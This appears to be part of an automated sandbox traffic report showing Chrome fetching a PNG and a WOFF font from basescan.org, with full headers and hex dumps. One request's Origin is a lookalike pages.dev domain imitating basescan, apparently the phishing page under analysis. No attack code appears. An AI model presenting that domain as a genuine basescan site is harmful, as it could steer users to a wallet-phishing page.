                                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                              Cf-Polished: origSize=9650
                                                                                                                                                                                                                                              ETag: "056d290d586d91:0"
                                                                                                                                                                                                                                              Last-Modified: Mon, 15 May 2023 02:33:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 132488
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wvAFwe0BmYS02ksua5QxlEPfI%2FXPFrxD3lNOb2hVJZBW9g7C55yUA%2FG73R2Qgb36YXTRmsstD7PWKuc4ktjkr0C69JOs2cef2nD38ScdX2Bsie2TzJP35a%2BB%2BvScmw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2df6eff6a52-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC521INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 17 de 49 44 41 54 78 da ec 9d 4b 68 5c 65 14 c7 7d 22 15 a1 2a 3e 10 04 1f 1b c1 17 08 2a 88 e2 63 e1 42 b4 1b 37 8a 2e 14 14 ac 75 a3 74 27 58 ba f2 55 11 04 95 82 0b eb 6b 53 8a 0b ad 42 c9 f9 ee b4 cd f9 ee 24 3a 34 e7 dc 69 d2 96 69 92 3e ac 49 b4 31 4d 9a 47 4b 4d ae 39 43 0c 41 9c 26 99 de 7b e7 ce cc ff 0f 3f 28 6d 92 49 cf f9 ff bf 66 4e bf fb 7d 17 41 cd ad 30 3c be a6 23 94 fb 82 30 7a 81 58 36 39 d6 2d ce eb e7 c4 ba cd 79 dd 4e 5e 76 3a 96 c0 b1 76 39 af 65 62 ed 77 ac 43 e4 65 dc 79 8d 0d fb b5 fd 9e fd 99 7d 8c 7d ac 7d 8e 7d ae 7d 0d e7 e5 4b f2 fa 99 7d 6d 7b 0d 7b 2d 7b 4d 54 1f 82 32 52 47 a9 7f 2d f9 e8 21 62 7d c5 79 fd 68 9e 9f 88
                                                                                                                                                                                                                                              Data Ascii: PNGIHDR\rfIDATxKh\e}"*>*cB7.ut'XUkSB$:4ii>I1MGKM9CA&{?(mIfN}A0<#0zX69-yN^v:v9ebwCey}}}}}K}m{{-{MT2RG-!b}yh
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 0c d5 a5 42 a7 3c 42 5e 76 22 50 cd 8d f5 d0 7a 09 47 43 2b 52 e0 cb 4f 13 6b 27 c2 d3 5a 54 7b ca d1 53 70 38 54 6b b8 77 af f3 ba 1b 61 69 79 76 07 ac 77 c0 f1 50 55 61 d8 7b 2d b1 6c 25 af b3 08 47 9b c0 72 ce f6 12 58 ef 91 80 36 55 1c c7 97 38 af af 93 d7 51 84 a2 3d a9 f6 9e 65 bd 79 01 89 68 23 d9 a1 15 d8 c0 03 16 61 11 f3 04 92 d1 e2 da e5 f5 06 e7 f5 eb 79 e6 60 7c f0 1f e6 88 f5 2b f3 08 92 d2 82 0f e9 90 97 8d f3 8c c3 e8 e0 7c 98 47 6c 8b 37 1e 3a 6a 11 39 1f 3d ea bc 1e 80 b9 c1 2a 39 60 de 41 82 9a 77 c8 77 31 b1 6c c2 0e 3e 50 2f e6 9d 80 e5 1d f3 12 12 d5 74 ef f5 65 17 4c 0c 92 41 76 61 36 d0 24 0a 8a 3d 0f 3b af c3 30 2d 48 98 61 f3 16 12 96 53 6d 8f e3 4b f1 23 3f c8 e2 2d 81 79 0d 89 cb 91 ec 00 49 ec df 07 59 61 5e c3 5b 82 9c 88 b8
                                                                                                                                                                                                                                              Data Ascii: B<B^v"PzGC+ROk'ZT{Sp8TkwaiyvwPUa{-l%GrX6U8Q=eyh#ay`|+|Gl7:j9=*9`Aww1l>P/teLAva6$=;0-HaSmK#?-yIYa^[
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 19 80 00 c1 77 d3 0b d4 d4 40 d2 9b fa 4f ff 28 39 21 d9 66 e0 4f 5d 16 d1 68 ee 52 53 03 49 6f ca c8 7d c5 a7 7f f2 9c 44 eb 6b b6 5a 93 e6 b4 36 00 80 60 31 f4 4c e7 e9 3f 93 5e 2f c5 c9 31 09 d6 d7 de 41 27 0b 03 00 08 16 42 c9 b1 ca 5b 80 38 0b c9 35 03 7f 66 b2 8c a5 7a 83 1a e7 f1 8c 80 0c f6 e4 e9 af af f7 33 a9 80 bf ac 0c 00 20 58 a0 5b 84 bd 0e 18 2d 45 ee 09 89 d5 d7 e6 f6 57 69 4a 53 59 c7 76 6b 9f 5a 1b 48 7a d6 e7 a1 9f 84 a4 9a 80 3f 73 65 10 00 41 1b 03 98 f2 f4 e9 af 7a 8f 84 ea 6a 7c a2 2a e0 2f 6b 03 00 08 16 4b bd 52 3c 7f d3 07 fc 1b 25 99 ba 5a aa 6f 4a 33 66 6d 00 00 c1 e2 69 d4 c7 9f 7f 2b 24 52 1d fc 85 60 00 00 c1 c2 29 59 e6 cc 7f e0 da da 69 4b 23 86 60 00 00 41 4e 09 f2 e7 9f a5 3e ce d7 a5 09 43 31 00 80 20 7f 06 fe 8b 72 b9
                                                                                                                                                                                                                                              Data Ascii: w@O(9!fO]hRSIo}DkZ6`1L?^/1A'B[85fz3 X[-EWiJSYvkZHz?seAzj|*/kKR<%ZoJ3fmi+$R`)YiK#`AN>C1 r
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 25 2c de b8 e9 06 1a a3 11 ce 96 5b 83 6f 5f 0a aa ec 33 34 c6 2b 1c 1c 39 8f 96 51 24 a7 1a 1e 9d 70 0b 94 07 ef 1a 56 56 57 dd e8 78 33 4a 40 e3 4c 71 b6 f4 f1 96 b5 e0 d4 05 d8 82 53 33 73 6e 76 ee ba eb 1d 18 0e fd 99 a3 7d 0d 77 fe c2 24 13 80 67 4c 5e 99 89 24 05 86 33 c4 59 4e f1 2a f0 16 ac ed 0e 44 c5 3e 41 43 dc 1e cc 4b cb cb 6e cd 39 37 71 69 ca 1d e9 3d 11 fa b3 c7 ec 29 37 3d 73 8d 09 c0 83 12 f0 cb f5 d3 61 cf 01 67 86 b3 c3 19 e2 2c 71 a6 f4 ed 16 22 f6 83 72 75 e0 41 1a e3 76 e2 de 38 00 2c 2d af b8 a1 d1 09 57 0a f9 59 28 d4 9c 1c 39 e7 e6 17 16 98 00 62 62 c3 f6 61 55 7f 70 46 f8 79 7c 8e 33 00 77 20 62 3f 70 ce dd 2d 94 59 a1 41 6e e7 c5 c9 ab 6e 33 e6 16 16 f1 37 7c a4 27 89 f1 89 49 26 80 e8 e8 f8 e9 0b 67 b4 09 38 43 fa f2 56 54 76
                                                                                                                                                                                                                                              Data Ascii: %,[o_34+9Q$pVVWx3J@LqS3snv}w$gL^$3YN*D>ACKn97qi=)7=sag,q"ruAv8,-WY(9bbaUpFy|3w b?p-YAnn37|'I&g8CVTv
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: f9 91 1d 13 b1 19 f8 46 a9 a7 f6 28 2e 19 d0 e0 fe 64 c7 73 04 ca 78 67 87 6b 07 2b e6 91 a0 1b 10 da be 48 83 fb 93 1d 2f 28 d0 f6 e4 19 fb d7 fc f3 8f 83 d5 fa e3 34 ba 57 d9 71 b6 fc c8 38 53 7f fe 81 ab 86 34 3c 5b 83 94 f1 ce 04 0f 05 31 c1 95 61 19 94 1d 2f 08 d0 e6 e4 99 fa 5e f9 95 06 a4 b6 82 07 e0 57 76 3c ef 68 52 c6 db 2f 95 29 05 69 a1 a4 ec fb 85 32 2b 3c 08 b6 06 29 e3 dd 7d 22 f6 44 af 79 5f 10 11 9c 11 c8 ab ec b8 7f 50 c6 bb 58 fb fe fc 03 22 22 42 d9 73 3c 0c bf b2 e3 9e 41 19 ef 9c 11 31 87 d8 0b b2 00 a1 ed 53 3c 14 ef b2 e3 79 6a f9 51 c6 db 33 11 73 41 1b b0 20 48 d9 71 b6 fc 58 f8 4b a3 20 68 6f f2 80 32 2f 3b 4e 19 ef 1c 13 31 16 a3 f0 e7 17 58 44 c0 43 f2 af 2d 90 55 4c b2 e5 97 ea b2 0f 16 04 a9 2d c0 96 1f 0b 7f 2c 08 52 76 fc
                                                                                                                                                                                                                                              Data Ascii: F(.dsxgk+H/(4Wq8S4<[1a/^Wv<hR/)i2+<)}"Dy_PX""Bs<A1S<yjQ3sA HqXK ho2/;N1XDC-UL-,Rv
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC170INData Raw: 94 7b ec 3b a5 ae ed 96 da ee c3 72 d3 3c 26 05 fc 3f 6f 2c 66 dd 87 f9 0a 4e de 11 44 cc 41 a5 72 75 e0 41 14 c5 a4 32 4f e3 d1 59 2a 7b 40 60 82 51 d9 1b 29 b4 e3 6e 6c 7c f7 01 a1 cd 6f a5 b6 df 17 aa fe 39 b4 e7 38 70 43 10 5d 86 d4 83 0f 48 2c 40 ad d4 9e 14 ca 7e 47 68 fb 43 f4 cb 11 9c 42 d9 3f 0a 6d ff 21 94 3d 28 b4 e9 13 ca 0c 0b 6d 27 37 3d 9a 4f e2 df e1 bf e1 67 f0 b3 f8 0c 3e 8b df 81 df 85 df 59 d2 b5 af e2 3b f0 5d b4 78 31 f0 5f 17 30 ec be e3 11 a9 c4 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                              Data Ascii: {;r<&?o,fNDAruA2OY*{@`Q)nl|o98pC]H,@~GhCB?m!=(m'7=Og>Y;]x1_0IENDB`


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              100192.168.2.549847104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC708OUTGET /assets/vendor/font-awesome/webfonts/fa-regular-400.woff HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: font
                                                                                                                                                                                                                                              Referer: https://basescan.org/assets/vendor/font-awesome/css/fontawesome-all.min.css?v=24.4.4.9
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC809INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:06 GMT
                                                                                                                                                                                                                                              Content-Type: application/font-woff
                                                                                                                                                                                                                                              Content-Length: 231248
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Mon, 17 Aug 2020 07:47:00 GMT
                                                                                                                                                                                                                                              ETag: "072d6966a74d61:0"
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 59657
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZCoAymqI5LhuoGScw9qtse7lUV4efk1BHSYxAWOc0Tk%2FSpLd44CEVlmybJgMQWjJDn6ugqbgjZmdD4SmafF4eOjlhrkmudZYNx2pn%2BBpRDRd%2FiZJ72oZhqQYM6Lz%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2df7ff74381-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC560INData Raw: 77 4f 46 46 00 01 00 00 00 03 87 50 00 0d 00 00 00 06 f4 00 01 4b 02 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 46 54 4d 00 00 01 30 00 00 00 1c 00 00 00 1c 8e a8 39 ef 47 44 45 46 00 00 01 4c 00 00 00 1e 00 00 00 1e 00 2a 07 43 4f 53 2f 32 00 00 01 6c 00 00 00 4c 00 00 00 60 41 8e 56 e1 63 6d 61 70 00 00 01 b8 00 00 04 58 00 00 08 86 25 d8 2b 17 67 61 73 70 00 00 06 10 00 00 00 08 00 00 00 08 ff ff 00 03 67 6c 79 66 00 00 06 18 00 03 31 5e 00 06 4a a0 7b 59 62 e7 68 65 61 64 00 03 37 78 00 00 00 36 00 00 00 36 18 27 56 78 68 68 65 61 00 03 37 b0 00 00 00 21 00 00 00 24 04 44 09 7c 68 6d 74 78 00 03 37 d4 00 00 06 d9 00 00 1c f2 9b ca 06 6b 6c 6f 63 61 00 03 3e b0 00 00 13 1e 00 00 1c f8 14 98 98 34 6d 61 78 70 00 03 51 d0 00 00 00
                                                                                                                                                                                                                                              Data Ascii: wOFFPKFFTM09GDEFL*COS/2lL`AVcmapX%+gaspglyf1^J{Ybhead7x66'Vxhhea7!$D|hmtx7kloca>4maxpQ
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 9a ed 38 91 15 61 49 76 56 50 02 b5 22 a0 0e d4 89 ba 50 2a a5 51 3a bd 4a 99 94 45 e3 e8 43 9a 4d 5f 50 0e 2d a0 45 b4 98 96 d2 4a 5a 45 6b e9 07 2a a2 62 aa a2 1a aa a3 7a ba 42 77 c8 a5 26 6e c7 c0 29 9c ca 69 dc 9d 7b 72 5f 1e c8 e9 3c 84 33 79 0c 8f e3 09 3c 9d e7 f2 7c 5e ce 2b f9 3b 5e cd 05 5c c4 5b b8 84 f7 70 39 57 f1 ef 7c 8e eb f8 1a 37 b2 c7 4d 12 91 64 69 27 69 f2 bc bc 28 03 64 98 64 ca 58 99 2c d3 64 a6 2c 92 5c 59 26 2b 65 8d ac 95 8d f2 93 ec 90 5d b2 47 4a e5 a0 54 49 ad 5c 90 3b d2 a4 9f d4 69 ba a7 4e d7 99 3a 4b 8f d5 93 f4 34 3d 5b cf d1 f3 f4 42 9d a7 f3 f5 7a bd 49 97 e8 7d fa a0 2e d3 e5 fa b8 ae d1 75 ba 5e 5f d5 b7 b5 68 57 ff e5 46 dc a8 1b 73 bb bb 3d dc d7 dd 91 ee db ee 68 f7 a4 7b d9 b4 31 4b 4d 81 d9 60 0a cd 56 b3 cd 94
                                                                                                                                                                                                                                              Data Ascii: 8aIvVP"P*Q:JECM_P-EJZEk*bzBw&n)i{r_<3y<|^+;^\[p9W|7Mdi'i(ddX,d,\Y&+e]GJTI\;iN:K4=[BzI}.u^_hWFs=h{1KM`V
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: af a2 09 dc 3f 3f 74 c3 0d 0f dd 60 48 f0 40 7e 3d cf 6b 15 48 bf ef aa 4b 27 79 fd 06 f2 04 ea 80 f1 fe 29 d4 f1 51 26 c8 0c c0 98 24 91 08 b5 64 c6 d0 28 aa 5b f5 b0 39 85 cc 7a b5 90 87 c4 c2 28 c2 a2 de 8f c2 16 fa de 40 24 1c fb 43 ff b0 ff 0f 63 e1 c8 c0 a6 93 43 43 27 f5 c4 40 f2 50 3c 9b 8d 1f 4a 0e 24 56 38 0e 2d f6 5f 79 30 fe 19 bf ff 33 f1 43 f3 fd 03 f2 d0 90 bc 96 bc 3a 13 11 13 d9 6c 42 8c 64 ae 4e 7e 86 e7 69 1f 7d d0 c7 71 f4 35 26 c2 64 68 fd 3e 64 86 a1 9b 58 cc 6f 47 30 db db d9 7a b9 9f b5 c6 48 3a b6 4c d6 af ab da f1 3e 2e 15 78 cb 5b 02 29 ae ef b8 a6 ea 8f cd c8 45 79 06 1f 79 e7 d4 d4 3b 8f 98 0f 3c 80 74 36 af 1d 7d 2c 64 ca 3b 77 2a 91 d0 63 47 b5 3c 1b 7e 28 18 7c e8 c3 37 eb 0f 3e a8 df fc ce d9 59 67 3d 20 f8 cf 84 a0 de 21
                                                                                                                                                                                                                                              Data Ascii: ??t`H@~=kHK'y)Q&$d([9z(@$CcCC'@P<J$V8-_y03C:lBdN~i}q5&dh>dXoG0zH:L>.x[)Eyy;<t6},d;w*cG<~(|7>Yg= !
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 0f f2 b5 2a ac 6b d8 57 2e 1c c0 b5 02 01 f1 04 47 93 f5 c6 6e 11 79 45 c0 22 1f 0f 79 17 bd a1 69 7a 8d 09 22 16 14 5e fc 17 7f d1 ff b0 94 92 4a 2b 2b 8d 90 b7 e1 0d 7d 57 90 44 5e 15 f9 f0 33 de 50 c8 7b ec 18 b9 3e 13 e6 45 55 10 24 e1 7b 5e ef dd 13 92 d4 78 e1 4f 97 96 fe 94 3e 3a c6 50 18 25 9d 7f 16 f6 e0 19 80 f2 64 f5 33 41 77 da 82 ee b4 09 85 bc 03 10 12 88 42 c9 f7 7d ff d1 47 bf ff e8 47 7f ef 24 6c 37 24 5e 29 a8 29 75 87 8c 83 18 9d 79 94 3c b1 7f 70 92 3c f2 4e f1 e2 d3 aa fa 48 09 2b 51 85 d4 23 9e ff 35 0c d0 0e a0 57 bc 50 cb 26 80 86 fb 98 c3 b0 e7 33 64 5f c3 db 61 b7 8b 59 4c f6 be e5 74 de 30 75 20 ac 0b 99 9a e5 3c d6 b3 26 4d a4 c3 b7 9d ec 40 ae 9c 44 98 a3 71 2b 54 af c0 0b 20 58 e0 f2 24 bf 89 54 11 23 1e e1 22 bd 8a 25 5e e2
                                                                                                                                                                                                                                              Data Ascii: *kW.GnyE"yiz"^J++}WD^3P{>EU${^xO>:P%d3AwB}GG$l7$^))uy<p<NH+Q#5WP&3d_aYLt0u <&M@Dq+T X$T#"%^
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 71 b7 a1 8a 41 76 a5 55 31 b2 94 77 ad 39 71 0c f1 00 fc a5 b3 35 40 2e 06 c1 7f 10 32 c8 ff 6c 01 fe 56 9f 5c 38 b6 0a 17 fb 87 70 99 83 0d 5a 42 64 97 a6 16 53 a9 c6 74 2a 05 bf 35 f2 78 a1 b8 5a 5c 20 99 48 38 45 f3 9c 59 4c 35 56 49 be 14 e3 6f c9 50 d6 b7 af cd 87 4f 02 e4 64 c6 03 95 ff d0 ff a0 2c 07 e5 01 39 16 8c c9 e4 5f 34 18 0b 92 7f 72 30 46 12 82 68 d1 5e fc 8f fc 39 fb fe ab 54 5e 19 00 ee 38 49 70 b5 ee 08 e6 9a 7b de e4 2c 40 ce f5 26 b0 fe 47 4d 7b 0e 48 83 e7 b5 b8 fe 9c ae 45 9f 7b fe b9 25 4a c6 fe 04 12 9f d3 20 1d 92 e3 9a 3d 05 0f 16 29 59 ed d0 2f 5f 65 17 a1 0e 15 6a 70 38 46 20 49 0a 16 a2 9c 61 4f 7d 24 85 50 2b 26 eb 62 08 f6 2e 52 e1 df db bf 1a d7 e1 f5 8f 74 d4 fe bc 56 7a fe b9 e7 4f d3 6a 9e 82 ca ff 1e f1 90 d6 d9 0e 88
                                                                                                                                                                                                                                              Data Ascii: qAvU1w9q5@.2lV\8pZBdSt*5xZ\ H8EYL5VIoPOd,9_4r0Fh^9T^8Ip{,@&GM{HE{%J =)Y/_ejp8F IaO}$P+&b.RtVzOj
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 6c 38 99 0c a3 89 70 f2 b5 d2 ef 21 ce 7e 96 65 11 87 26 58 76 79 01 35 82 da 79 46 0b 8a 3b b7 34 a9 9c b8 be 65 a7 78 ec 6a 84 ec ff 8e d0 f0 b7 77 6d a1 7b db e5 79 c8 d8 66 3b 5b b3 91 3c a8 29 dd 31 6b 96 7b 22 66 6c 24 e6 d9 9c 31 cd 8c 29 15 25 a9 78 4a 92 0e a3 c5 4e 5a cb 5e 11 61 f0 09 2d fb a2 49 f2 fd 51 a9 99 6f 0e da 73 de 3e ff 15 16 a1 af 31 5e 46 87 f1 19 84 f6 c0 8c 3a c7 f9 80 ff 4d 44 78 3e ab c0 c1 48 00 17 e8 83 b4 2a a0 d5 0c 1e c7 a6 85 7e ae eb f6 b7 de a3 06 d9 3e b4 4d 9f d0 ed 6f 0c 96 3e 7e f8 07 fb 82 a5 a1 a0 8a de 8b a5 1a d6 71 e9 70 09 dd 43 1f f6 b1 41 f5 3d 40 24 e9 f6 cf 4a 83 9f 38 6c 7f 51 0d 0e 95 82 fb 50 16 72 d5 31 c9 e8 d0 24 5f a5 f4 b9 49 c6 86 c8 24 74 4d 20 5c ce a8 58 ab 86 a6 30 95 9b 18 7a 52 5c 58 5e 60
                                                                                                                                                                                                                                              Data Ascii: l8p!~e&Xvy5yF;4exjwm{yf;[<)1k{"fl$1)%xJNZ^a-IQos>1^F:MDx>H*~>Mo>~qpCA=@$J8lQPr1$_I$tM \X0zR\X^`
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 9b d6 9f d7 e7 f0 85 95 99 ba ce ee 47 a7 a6 24 c9 94 e4 a9 29 19 6e 52 57 ac fb 30 ff d1 8d b2 b8 b1 57 d4 21 18 70 69 17 dc 89 1c ad ba e9 b4 03 ed a7 0d d9 2a cb 9f 92 a5 eb 64 19 5e 3d f9 88 24 bb 75 3b 63 e0 95 a5 4f ca f2 75 b4 c2 6d ef 92 88 bc a2 b3 ae 09 22 af 58 37 02 ba c6 76 90 fb 40 e6 4c 71 54 2d 53 73 c6 84 50 3d e1 e6 21 66 d7 90 54 c2 f1 30 16 46 05 2c 05 15 55 92 64 ae cf e7 09 a8 32 96 e3 b2 98 9b ce 6f 9f e9 cb f4 f5 65 ba 07 e7 1d 66 4a f3 4b 22 61 f6 65 55 f7 63 51 80 e2 82 ea c7 aa 47 c6 06 56 ea d5 2f 92 42 7d 14 6e 77 b6 9d 48 ad d7 b5 bd 45 6f b7 8e 5b 6b d9 d6 a2 a9 94 8d ce e6 7e 81 be f7 66 b2 f6 c8 bf 69 f8 eb 6e da 8f 69 73 ff 27 01 0c d3 44 25 ea 88 ea d2 83 ae 5e f3 1c d1 c0 c8 39 f2 72 18 1b 77 43 00 2d e8 56 39 85 2c 77
                                                                                                                                                                                                                                              Data Ascii: G$)nRW0W!pi*d^=$u;cOum"X7v@LqT-SsP=!fT0F,Ud2oefJK"aeUcQGV/B}nwHEo[k~finis'D%^9rwC-V9,w
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: e3 b4 cd 0a 57 48 5b 0a 75 21 ec d8 3e 11 e1 51 d5 9a 82 0c 18 c6 76 14 46 14 27 59 94 1a 9b 99 79 d5 0c ef d5 cc 34 f6 a1 11 8e 1b 7a f2 ba ad af bb 2a 4e 02 9f 7f f2 9f f6 bd 31 97 7b e3 bb df 98 8b ec bb 0e 95 20 e3 cc a8 df 87 d3 a6 e6 15 6e c2 7e 3c 77 d3 c8 a1 1a bd df f4 bf 2f dd b1 e3 d2 4b 77 0c cf 64 19 e1 fc 79 a0 5d de 44 6d 70 fa 60 cc 2a cc 2e 62 e5 e4 6a d9 16 5c 65 da 4a d9 14 a8 46 20 d5 c9 2a 58 19 5c 70 56 34 34 57 84 30 b4 90 2b 5b 26 7d 08 ed ae 43 10 27 11 7b 9f c8 2b bc 24 f2 bf fe 84 1b 40 82 47 1d 99 61 af a1 d7 85 58 ff 58 ad ea b4 3f dc 9f 8f 06 73 6f dc 47 93 ae 7b 72 a8 95 62 0a 40 fd a9 50 f2 cf dc c0 23 ec f6 91 bb e0 ef dd 78 20 e4 74 68 30 93 8c a5 77 5c 6a af 41 ca 4d 73 ed 04 e0 c9 5e 84 be ed 41 5f a3 d0 81 ca 65 ad bc
                                                                                                                                                                                                                                              Data Ascii: WH[u!>QvF'Yy4z*N1{ n~<w/Kwdy]Dmp`*.bj\eJF *X\pV44W0+[&}C'{+$@GaXX?soG{rb@P#x th0w\jAMs^A_e
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 2f 59 f0 1d 29 f6 e7 f7 ca 2e ef cf 94 59 01 1d 24 f5 36 39 03 a7 be 74 ef b9 0f b0 ed e8 ba 75 6f 91 d6 d5 84 c6 db 8d 91 a5 ee c6 d1 b8 43 bb b7 ce 6a 89 5e c3 4e a2 43 dc 86 d1 3d ea 43 ee ec 56 7a e2 e6 ba 59 0f 03 e3 de 93 09 bd cb 3d ac 96 84 ff da 0a ed 6b 85 fe 80 b2 55 25 6f c8 39 fd 6e a5 37 dc a3 71 7a f9 76 eb f2 36 f7 52 a2 d9 43 5e 34 e7 a8 3c 94 24 61 17 79 04 97 0e 9b 52 8f ab 6f 4b ce 00 77 13 0a a3 8d 9d d3 dd 6a 80 b4 bd 38 0d 68 35 8b 2b 2d 2b 04 57 7e 5a 70 29 67 97 92 17 9f 3a 21 8a 27 44 d4 68 ae ea d3 19 2d 72 96 e0 d3 06 5a 3e ab fe e8 30 55 fe 0b 53 e5 bf ba ac c9 69 93 b4 51 d1 d0 82 38 20 c2 cf 45 a5 b0 0a 47 42 f1 79 7b 0d 35 fc 8f 50 b5 c2 27 a8 5a e1 1e 92 db 4c 43 41 ad 53 a6 16 74 4e 32 19 ca 54 10 43 2e f8 4f e9 e5 6a de
                                                                                                                                                                                                                                              Data Ascii: /Y).Y$69tuoCj^NC=CVzY=kU%o9n7qzv6RC^4<$ayRoKwj8h5+-+W~Zp)g:!'Dh-rZ>0USiQ8 EGBy{5P'ZLCAStN2TC.Oj
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 2d e7 40 89 89 d0 ce eb 65 bc e0 58 d8 db 0b d5 a2 3a 77 6e 68 d7 da 25 28 36 a7 16 ab 68 51 c6 db 46 e7 d5 c1 71 e9 0a c7 6d d0 15 d2 f8 a0 3a 3f ba 0d cb 54 a9 fc 0d e1 aa 36 be 73 ed e4 2d 7b f6 dc 74 ef 37 12 3b c7 b5 6a 67 fb fb 81 62 de d8 f6 b7 47 e7 3d 57 21 04 04 31 ab ed 30 1f 1f 70 c9 9e 4e db df 25 62 f1 bb ac 15 b5 65 b3 2f 35 7d 9e 59 68 2c 2c 9f 5b a2 1a 1c 4b e8 4c af e1 6f 6a 12 f2 42 d6 c9 14 31 fb b5 1b 8b f4 1d a9 c5 7d 6d bb df f3 2f 9f ff 12 cb a3 6f 02 6c 9c 61 2e 83 94 24 82 41 0e 6b 62 9e 98 a5 b1 40 23 e4 a7 c4 30 a0 53 b3 9e 87 07 79 8d 0f c3 83 30 a4 87 cb 53 44 d4 9a af e7 c3 74 5e 34 44 44 af 40 52 a0 ff 3c e4 f1 f2 ac c4 2b 85 a9 9d 13 13 c5 9c 14 ae af 4b a9 29 c3 81 40 a5 be 75 d7 ce 14 27 22 0f c4 7c 43 c5 4a 79 32 91 21
                                                                                                                                                                                                                                              Data Ascii: -@eX:wnh%(6hQFqm:?T6s-{t7;jgbG=W!10pN%be/5}Yh,,[KLojB1}m/ola.$Akb@#0Sy0SDt^4DD@R<+K)@u'"|CJy2!


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              101192.168.2.549843104.26.12.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:06 UTC359OUTGET /images/gen/cexio_20.png HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC848INHTTP/1.1 200 OK
